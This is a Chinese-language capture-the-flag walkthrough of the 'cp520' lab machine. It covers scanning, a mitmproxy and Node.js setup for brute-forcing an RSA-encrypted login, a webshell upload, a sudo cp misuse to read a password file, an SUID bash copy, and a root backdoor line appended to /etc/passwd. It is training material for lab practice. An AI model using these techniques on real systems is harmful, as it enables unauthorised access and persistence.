MazeSec-cp520-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
ad192.168.60.143        08:00:27:84:41:b6       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:7e:1b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.025 seconds (126.42 hosts/sec). 4 responded
❯ export ip=192.168.60.143
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.143:22
Open 192.168.60.143:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 21:07 CST
Initiating ARP Ping Scan at 21:07
Scanning 192.168.60.143 [1 port]
Completed ARP Ping Scan at 21:07, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:07
Completed Parallel DNS resolution of 1 host. at 21:07, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:07
Scanning 192.168.60.143 [2 ports]
Discovered open port 80/tcp on 192.168.60.143
Discovered open port 22/tcp on 192.168.60.143
Completed SYN Stealth Scan at 21:07, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.143
Host is up, received arp-response (0.00040s latency).
Scanned at 2025-06-06 21:07:07 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:84:41:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.143
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 874]
/login.php            (Status: 200) [Size: 41]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.60.143/uploads/]
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.143/assets/]
/includes             (Status: 301) [Size: 319] [--> http://192.168.60.143/includes/]
/captcha.php          (Status: 200) [Size: 2663]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问一下

首页存在登录表单

经过测试得知，抓包后验证码为空也可以进行登录

不过前端利用auth.min.js对传入的password进行了加密

document.addEventListener("DOMContentLoaded", () => {
    function r() {
        document.getElementById("captchaImage").src = "captcha.php?rand=" + Math.random()
    }
    document.getElementById("loginForm").addEventListener("submit", async function(e) {
        e.preventDefault();
        var t = new JSEncrypt
          , n = (t.setPublicKey(`-----BEGIN PUBLIC KEY-----
    MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtLlBu4KjqP4t7Bc6bf/2
    1TrHJbKl5iGfAlxn/c1WxbjhA/BRoQNpGX7+8oROMarMDJnS2ddJBtpdAnovE3o+
    NX45Eb1eTH9Isis/3mIXgVhuQ0Fhi11eo82hFQRXZOolJwfGqm7lL4r6OQJ96zur
    IodiC2uxcmR/+YDjrhZhMlUYG2/OTm1bROEg1FV9gARh27SA4/VLbBsst69wS8Wj
    m5fPQGd31QBN/8UvwyT/QCTpQdxV3PARXORVsdYLD+iNSrwwO/+cq6gNwthLxhbS
    he40vUae0GtJjpkD5xJhkRXGuoj/D3/cd4KytNeiGezIeLQr+AER6kf6B8vHoPfk
    eQIDAQAB
    -----END PUBLIC KEY-----`),
        document.getElementById("password").value)
          , t = t.encrypt(n)
          , n = document.getElementById("captcha").value;
        try {
            var o = await (await fetch("login.php", {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    username: e.target.username.value,
                    password: t,
                    captcha: n
                })
            })).json();
            o.success ? window.location.href = "upload.php" : (document.getElementById("errorMessage").textContent = "Login Failed: " + o.error,
            r())
        } catch (e) {
            console.error("ERROR:", e),
            document.getElementById("errorMessage").textContent = "Network Error"
        }
    }),
    document.getElementById("refreshCaptcha").addEventListener("click", function(e) {
        e.preventDefault(),
        r()
    })
}
);

而且此js并没有进行混淆，这样我们通过代码中的公钥对需要爆破的秘密重新加密

// encrypt_password.js
// 确保你已经运行了 npm install node-forge
const forge = require('node-forge');

const plaintext = process.argv[2]; // 第一个命令行参数是密码

if (!plaintext) {
    console.error("Error: Password not provided. Usage: node encrypt_password.js <plaintext_password>");
    process.exit(1);
}

const publicKeyPem = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtLlBu4KjqP4t7Bc6bf/2
1TrHJbKl5iGfAlxn/c1WxbjhA/BRoQNpGX7+8oROMarMDJnS2ddJBtpdAnovE3o+
NX45Eb1eTH9Isis/3mIXgVhuQ0Fhi11eo82hFQRXZOolJwfGqm7lL4r6OQJ96zur
IodiC2uxcmR/+YDjrhZhMlUYG2/OTm1bROEg1FV9gARh27SA4/VLbBsst69wS8Wj
m5fPQGd31QBN/8UvwyT/QCTpQdxV3PARXORVsdYLD+iNSrwwO/+cq6gNwthLxhbS
he40vUae0GtJjpkD5xJhkRXGuoj/D3/cd4KytNeiGezIeLQr+AER6kf6B8vHoPfk
eQIDAQAB
-----END PUBLIC KEY-----`;

try {
    const publicKey = forge.pki.publicKeyFromPem(publicKeyPem);
    
    // JSEncrypt 默认使用 PKCS#1 v1.5 填充
    const encrypted = publicKey.encrypt(plaintext, 'RSAES-PKCS1-V1_5');
    // 如果 JSEncrypt 使用了 Base64 URL safe 编码，这里也需要调整
    // 但通常情况下，前端 RSA 加密后直接 Base64 编码是标准做法
    const encryptedBase64 = forge.util.encode64(encrypted);

    console.log(encryptedBase64); // 只输出加密后的 Base64 字符串

} catch (e) {
    console.error("Encryption failed:", e.message);
    process.exit(1);
}

node.js运行一下，可以正常输出密文

 ⚡maple ❯❯ node .\abc.js abc    
pZKsXNiiy+0jv4PqRO1P9BNaIZZCZbBXwrrPKPjTqxYs7qut1zwpKaWok3rwQYmCNtu0DzuTQ3+AKcfL69qQkOeeHyYcfvhctcrOIIg01zpfYSYu70O3Cq2ADfrzJFJ4iSlTR4jkwVyx5gRXef2C6gnfdsmTioymWilJhCLPOTQ1xtjddPiyx9xDdYTYFgTbBgZbvxOso11FPgMtWZqE9eu0NN/jXYdRTCgZd5rQeg0Ikiquto4bjbVpG4B79vndVySPw70jmsABRB1efPD7mQUQNlFDx09qIuJ5leXErhgKB7XFoU6mHw2sHodkmAzIHFK04JVHCFAWfSC3FtE0HQ==

利用mitmdump，进行中间人修改请求包的请求体内容

python直接调用nodejs的输出

import requests
import json
import subprocess
import os
import sys

# 定义调用 Node.js 脚本的函数
def encrypt_password_with_nodejs(password_to_encrypt):
    """
    通过调用 Node.js 脚本来加密密码。
    """
    JS_ENCRYPT_SCRIPT_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "abc.js")
    
    # 调用 Node.js 进程
    # capture_output=True 用于捕获 stdout 和 stderr
    # text=True 表示以文本模式处理输入输出，否则是字节模式
    result = subprocess.run(
        ["node", JS_ENCRYPT_SCRIPT_PATH, password_to_encrypt],
        capture_output=True,
        text=True,
        check=True # 如果命令返回非零退出码，则抛出 CalledProcessError
    )
    # Node.js 脚本会将加密结果打印到标准输出
    encrypted_base64 = result.stdout.strip()
    return encrypted_base64

class Recorder:

    def requestheaders(self, flow):
        pass

    def request(self, flow):
        # 获取原始请求体内容并解码为字符串
        password_to_encrypt = flow.request.content.decode('utf-8')
        # 解析JSON格式的请求体
        req_body = json.loads(password_to_encrypt)
        # 获取原始明文密码
        original_plaintext_password = req_body.get("password")
        password_to_encrypt = original_plaintext_password
        print (f"原始密码: {password_to_encrypt}")
        # 调用Node.js脚本加密密码，返回Base64字符串
        encrypted_body_hex = encrypt_password_with_nodejs(password_to_encrypt)
        print (f"Node.js加密后的Base64字符串: {encrypted_body_hex}")

        # 用加密后的密码替换请求体中的密码字段
        req_body["password"] = encrypted_body_hex
        # 将修改后的请求体重新编码为JSON字符串
        modified_request_body_str = json.dumps(req_body)
        print(f"修改后的请求体: {modified_request_body_str}")
        # 更新flow对象中的请求体内容
        flow.request.content = modified_request_body_str.encode('utf-8')

    def response(self, flow):
        pass

    def error(self, flow):
        print(f'HTTP Error With [{flow.response.reason}], and body: {flow.response.text}')

addons = [
    Recorder()
]

监听端口，Burpsuite设置上游服务器

 ⚡maple ❯❯ mitmdump -s .\c.py -p 1234
[23:07:18.165] Loading script .\c.py
[23:07:18.230] HTTP(S) proxy listening at *:1234.

得到凭证admin:justine

登录后可以进行上传文件

用户提权

传个反弹shell上去，发现一连就断

猜测可能禁用了某些函数

上传一句话木马，利用antsword蚁剑连接，弹个shell过来

监听端口

存在两个用户ihatemath ilovelinux

并且都可以读取

➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from cp520-192.168.60.143-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/cp520~192.168.60.143_Linux_x86_64/2025_06_08-11_04_56-130.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@cp520:/var/www$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
ihatemath:x:1000:1000:,,,:/home/ihatemath:/bin/bash
ilovelinux:x:1001:1001:,,,:/home/ilovelinux:/bin/bash
www-data@cp520:/var/www$ cd /home/
www-data@cp520:/home$ ls -la
total 16
drwxr-xr-x  4 root       root       4096 May 29 02:22 .
drwxr-xr-x 18 root       root       4096 Mar 18 20:37 ..
drwxr-xr-x  3 ihatemath  ihatemath  4096 May 29 22:12 ihatemath
drwxr-xr-x  2 ilovelinux ilovelinux 4096 May 29 22:11 ilovelinux
www-data@cp520:/home$ cd ilovelinux/
www-data@cp520:/home/ilovelinux$ cat user.flag
flag{user-62cdc3953c5611f0b354000c29094b2d}

分别查看两个用户隶属的文件

www-data@cp520:/home/ilovelinux$ find / -user ihatemath 2>/dev/null
/usr/local/bin/irc_bot.py
/home/ihatemath
/home/ihatemath/.bash_logout
/home/ihatemath/.bashrc
/home/ihatemath/.bash_history
/home/ihatemath/.profile
/opt/ihatemath.pass
www-data@cp520:/home/ilovelinux$ find / -user ilovelinux 2>/dev/null
/home/ilovelinux
/home/ilovelinux/.bash_logout
/home/ilovelinux/.bashrc
/home/ilovelinux/.bash_history
/home/ilovelinux/.profile
/home/ilovelinux/.viminfo
/var/local/images.jpg
www-data@cp520:/home/ilovelinux$ ls -al /opt/ihatemath.pass
-rw------- 1 ihatemath ihatemath 13 May 29 02:33 /opt/ihatemath.pass
www-data@cp520:/home/ilovelinux$ ls -al /var/local/images.jpg
-rw-r--r-- 1 ilovelinux ilovelinux 11398 May 29 09:31 /var/local/images.jpg

只有images.jpg可以读

利用strings查看隐藏信息，在第二行中存在摩斯电码，以斜杠作为分隔

www-data@cp520:/home/ilovelinux$ strings /var/local/images.jpg |head -n 2
JFIF
..../.-/.--./.--./-.--/..--.-/-../.-./.-/--./---/-./..--.-/-.../---/.-/-/..--.-/..-././.../-/../...-/.-/.-../..--.-/-/---/...././-..-

解码一下，得到HAPPY_DRAGON_BOAT_FESTIVAL_TOHEX

利用此密码尝试登录，无果

密码中有提示，将HAPPY_DRAGON_BOAT_FESTIVAL转为十六进制，即为正确的密码

并且此用户拥有sudo权限，可以执行cp命令

www-data@cp520:/home/ilovelinux$ echo -n "HAPPY_DRAGON_BOAT_FESTIVAL"|xxd -p
48415050595f445241474f4e5f424f41545f464553544956414c
www-data@cp520:/home/ilovelinux$ su ilovelinux
Password:
ilovelinux@cp520:~$ sudo -l
sudo: unable to resolve host cp520: Name or service not known
[sudo] password for ilovelinux:
Matching Defaults entries for ilovelinux on cp520:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ilovelinux may run the following commands on cp520:
    (ihatemath) /bin/cp

所以尝试将ihatemath.pass复制过来，不过总所周知cp命令是会保留源文件的文件权限

ilovelinux@cp520:~$ cd /tmp/
ilovelinux@cp520:/tmp$ sudo -u ihatemath /bin/cp /opt/ihatemath.pass .
sudo: unable to resolve host cp520: Name or service not known
ilovelinux@cp520:/tmp$ ls -al
total 12
drwxrwxrwt  2 root      root      4096 Jun  7 23:20 .
drwxr-xr-x 18 root      root      4096 Mar 18 20:37 ..
-rw-------  1 ihatemath ihatemath   13 Jun  7 23:20 ihatemath.pass

所以我们可以提前新建个文件，权限给777，然后再cp

即可读到文件内容，尝试切换用户

ilovelinux@cp520:/tmp$ touch 1
ilovelinux@cp520:/tmp$ chmod 777 1
ilovelinux@cp520:/tmp$ sudo -u ihatemath /bin/cp /opt/ihatemath.pass 1
sudo: unable to resolve host cp520: Name or service not known
ilovelinux@cp520:/tmp$ cat 1
3c5611f0ae3f
ilovelinux@cp520:/tmp$ su ihatemath
Password:
ihatemath@cp520:/tmp$ cd ~
ihatemath@cp520:~$ sudo -l
sudo: unable to resolve host cp520: Name or service not known
[sudo] password for ihatemath:
Matching Defaults entries for ihatemath on cp520:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ihatemath may run the following commands on cp520:
    (ALL : ALL) /bin/joke

Root提权

可以以root身份执行joke

查看程序help，靶机没改hosts每次sudo都要等一会

ihatemath@cp520:~$ sudo /bin/joke -h
sudo: unable to resolve host cp520: Name or service not known
Haha, it's a joke. Now you are root~
ihatemath@cp520:~$ strings /bin/joke
strings: /bin/joke: Permission denied
ihatemath@cp520:~$ ls -al /bin/joke
-rwxr-x--- 1 root root 110 May 29 02:49 /bin/joke

看了一下程序大小，估计是烟雾弹

只会打印出这一段话

利用pspy64监测一下系统进程

2025/06/08 05:04:08 CMD: UID=0     PID=1      | /sbin/init
2025/06/08 05:04:09 CMD: UID=0     PID=1870   | sudo /bin/joke
2025/06/08 05:04:10 CMD: UID=0     PID=1871   |
2025/06/08 05:04:34 CMD: UID=0     PID=1873   | cp /bin/bash /tmp/whatsthis
2025/06/08 05:04:34 CMD: UID=0     PID=1872   | /bin/bash /bin/joke
2025/06/08 05:04:34 CMD: UID=0     PID=1874   | chmod +s /tmp/whatsthis

那joke程序执行了cp bash到/tmp/whatsthis并且给了suid权限这个操作

ihatemath@cp520:~$ ls -la /tmp/whatsthis
-rwsr-sr-x 1 root root 1168776 Jun  7 23:45 /tmp/whatsthis
ihatemath@cp520:~$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
ihatemath@cp520:~$ md5sum /tmp/whatsthis
4600132e6a7ae0d451566943a9e79736  /tmp/whatsthis
ihatemath@cp520:~$ md5sum /bin/bash
4600132e6a7ae0d451566943a9e79736  /bin/bash

正常提权即可

ihatemath@cp520:~$ /tmp/whatsthis -p
whatsthis-5.0# id
uid=1000(ihatemath) gid=1000(ihatemath) euid=0(root) egid=0(root) groups=0(root),1000(ihatemath)
whatsthis-5.0# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>/etc/passwd
whatsthis-5.0# exit
exit
ihatemath@cp520:~$ su primary
Password:
root@cp520:/home/ihatemath# id
uid=0(root) gid=0(root) groups=0(root)
root@cp520:/home/ihatemath# cat /root/root.flag
flag{root-a0782fa83c5511f092ea000c29094b2d}

后记

yakit通过热加载实现验证码识别，需要本地启动api

sml2h3/ddddocr-fastapi: 使用ddddocr的最简api搭建项目，支持docker

beforeRequest = func(req) {
    // 假设这个接口请求验证码
    
    opts = []
    // 请求验证码，继承cookie
    for k, v in poc.GetHTTPPacketCookies(req) {
        opts.Append(poc.replaceCookie(k, v))
    }
    rsp, _ = poc.Get("http://192.168.60.143/captcha.php",  opts...)~
    // 此时验证码响应体就是 rsp.GetBody()
    body = rsp.GetBody()
    base64_image := codec.EncodeBase64(body)
    rsp2, _ = poc.Post("http://127.0.0.1:8000/ocr", poc.appendPostParam("image", base64_image))~
    result:=rsp2.GetBody()
    code=json.Find(result, `$.data`)
    req = re.ReplaceAll(req, `__captcha__`, code)
    return []byte(req)
}

至于如何实现加密密码，yakit这个语言不太会😅

• 相关登录逻辑

  因为 !empty($data['captcha']) 为 false，代码逻辑会直接进入 else 块

  <?php
  require_once __DIR__ . '/includes/config.php';
  session_start();
  
  $data = json_decode(file_get_contents('php://input'), true);
  
  $success = false;
  $error = '';
  
  if ($data && isset($data['password'])) {
      if (isset($data['captcha']) && !empty($data['captcha']) &&
          (!isset($_SESSION['captcha_code']) || strtoupper($data['captcha']) !== $_SESSION['captcha_code'])) {
          $error = 'Invalid CAPTCHA';
      } else {
          openssl_private_decrypt(
              base64_decode($data['password']),
              $decrypted,
              RSA_PRIVATE_KEY,
              OPENSSL_PKCS1_PADDING
          );
  
          if ($decrypted === VALID_PASSWORD && $data['username'] === VALID_USERNAME) {
              $_SESSION['authenticated'] = true;
              $success = true;
              unset($_SESSION['captcha_code']);
          } else {
              $error = 'Invalid username or password';
          }
      }
  } else {
      $error = 'Request error';
  }
  
  if (!$success) {
      // CAPTCHA will be regenerated on next captcha.php request
  }
  
  header('Content-Type: application/json');
  echo json_encode([
      'success' => $success,
      'error' => $error
  ]);
  ?>